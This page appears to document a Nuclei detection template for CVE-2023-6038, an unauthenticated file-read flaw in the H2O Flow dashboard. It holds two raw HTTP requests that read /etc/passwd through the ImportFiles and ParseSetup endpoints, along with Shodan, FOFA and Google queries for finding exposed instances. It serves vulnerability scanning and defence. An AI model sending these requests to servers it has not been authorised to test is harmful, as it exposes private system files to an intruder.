H2O ImportFiles - Local File Inclusion
ID: CVE-2023-6038
Severity: high
Author: danmcinerney,byt3bl33d3r
Tags: cve,cve2023,h2o-3,h2o,ml
Description
Section titled “Description”An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.
YAML Source
Section titled “YAML Source”id: CVE-2023-6038
info: name: H2O ImportFiles - Local File Inclusion author: danmcinerney,byt3bl33d3r severity: high description: | An attacker is able to read any file on the server hosting the H2O dashboard without any authentication. reference: - https://huntr.com/bounties/380fce33-fec5-49d9-a101-12c972125d8c/ - https://nvd.nist.gov/vuln/detail/CVE-2023-6038 - https://github.com/h2o/h2o classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-6038 cwe-id: CWE-862 epss-score: 0.06351 epss-percentile: 0.93636 cpe: cpe:2.3:a:h2o:h2o:-:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: h2o product: h2o shodan-query: - title:"H2O Flow" - http.title:"h2o flow" fofa-query: title="h2o flow" google-query: intitle:"h2o flow" tags: cve,cve2023,h2o-3,h2o,ml
http: - raw: - | GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1 Host: {{Hostname}}
- | POST /3/ParseSetup HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
source_frames=%5B%22nfs%3A%2F%2Fetc%2Fpasswd%22%5D
matchers-condition: and matchers: - type: dsl dsl: - "contains(body_1, 'ImportFilesV3')" - "regex('root:.*:0:0:', body_2)" - "status_code_2 == 200" condition: and# digest: 4a0a00473045022100edcaf61db08f1e359b5655e2ea92bc8a12cc5cd666e8f2940aee2e37564e372f02207bd51d52f83cf5bf9da92f51f1c25da46ee1df95e9acfc6e464c5014fbd012b5:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-6038.yaml"